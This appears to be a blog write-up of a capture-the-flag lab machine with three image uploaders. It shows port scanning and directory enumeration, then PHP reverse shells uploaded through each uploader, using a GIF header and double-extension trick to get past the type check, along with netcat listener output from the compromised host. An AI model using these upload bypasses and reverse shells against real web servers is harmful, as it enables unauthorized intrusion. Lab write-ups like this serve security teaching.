piyr9 bio photo

piyr9

A Curious Mind with a Craving for Information to Life's many Problems.

Overview

Scanning the Perimeter

Lets see what we have here:

	Nmap scan report for 192.168.76.101
	Host is up (0.00031s latency).
	Not shown: 998 closed ports
	PORT   STATE SERVICE VERSION
	22/tcp open  ssh     (protocol 2.0)
	| ssh-hostkey: 
	|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
	|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
	|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
	80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
	|_http-title: Site doesn't have a title (text/html).
	1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
	SF-Port22-TCP:V=6.47%I=7%D=4/22%Time=55384D20%P=x86_64-unknown-linux-gnu%r
	SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
	MAC Address: 08:00:27:9A:0D:2F (Cadmus Computer Systems)
	Device type: general purpose
	Running: Linux 3.X
	OS CPE: cpe:/o:linux:linux_kernel:3
	OS details: Linux 3.11 - 3.14
	Network Distance: 1 hop

	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.31 ms 192.168.76.101

Point the browser to 192.168.76.101 and notice there is an image uploader with 3 other alternatives

Image Uploader #1

Alt text

First upload php-reverse.php file from Kali linux

Next run dirbuster on the webserver

Alt text

There seemed to be an uploads2 folder, and when I used the 2nd upload method my test image popped up there. The 3rd upload method is the same as well with the corresponding uploads3 directory. So why wouldn’t there be an uploads1 directory? sure enough when I typed it in, there was.

Alt text

Click on the php reverse shell and my kali listener picked it up

	root@fox-kali:~# nc -lvp 4444
	listening on [any] 4444 ...
	192.168.76.101: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.101] 46425
	Linux zorz 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	 22:56:34 up  1:19,  0 users,  load average: 0.00, 0.01, 0.05
	USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$whoami
	www-data

	www-data@zorz:/var/www/html$ ls
	ls
	index.html   jQuery	    uploader.php   uploader3.php  uploads2
	index2.html  l337saucel337  uploader2.php  uploads1	  uploads3
	www-data@zorz:/var/www/html$ ls -ltr
	ls -ltr
	total 40
	-rwxr-xr-x 1 root     root     1980 Feb 18 16:40 uploader3.php
	-rw-r--r-- 1 root     root      398 Feb 18 20:20 uploader.php
	-rw-r--r-- 1 root     root     1410 Feb 18 20:50 uploader2.php
	-rwxr-xr-x 1 www-data www-data  367 Feb 18 20:54 index.html
	drwxr-xr-x 2 root     root     4096 Feb 18 22:22 jQuery
	-rwxr-xr-x 1 root     root      457 Feb 18 22:30 index2.html
	drwxr-xr-x 2 root     root     4096 Feb 18 22:45 l337saucel337
	drwxr-xr-x 2 www-data www-data 4096 Apr 22 22:37 uploads2
	drwxr-xr-x 2 www-data root     4096 Apr 22 22:41 uploads3
	drwxr-xr-x 2 www-data www-data 4096 Apr 22 22:42 uploads1
	www-data@zorz:/var/www/html$ cd l337saucel337
	cd l337saucel337
	www-data@zorz:/var/www/html/l337saucel337$ ls
	ls
	SECRETFILE
	www-data@zorz:/var/www/html/l337saucel337$ cat SECRETFILE
	cat SECRETFILE
	Great job so far. This box has 3 uploaders.

	The first 2 are pure php, the last one is php w/jquery.

	To get credit for this challenge, please submit a write-up or instructions
	on how you compromised the uploader or uploaders. If you solve 1, 2, or all
	of the uploader challenges, feel free to shoot me an email and let me know!

	admin@top-hat-sec.com

	Thanks for playing!
	http://www.top-hat-sec.com

##Image Uploader #2

Ok lets try the 2nd upload method, this one will need a bit more legwork

Since it only accepts certain image files, files with a .php extension will not work. Lets modify the file, open it in nano and put the GIF header in place:

	GIF89a;
	<?
	//put php reverse shell code here
	?>

Next rename the file

	root@fox-kali:~# mv php-reverse.php php-reverse.php.jpg

Upload the file, and it seems to work. Then navigate to the uploads2 folder and open a nc listener on kali, then proceed to click on the filename in the folder. Bingo!

	root@fox-kali:~# nc -lvp 4444
	listening on [any] 4444 ...
	192.168.76.101: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.101] 47052
	Linux zorz 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	 00:24:18 up  2:47,  0 users,  load average: 0.00, 0.08, 3.65
	USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	/bin/sh: 0: can't access tty; job control turned off
	$

##Image Uploader #3

Alt text

Ok lets try image uploader 3 Same with uploader2 process, it seems to work like before yielding a reverse shell using the same steps.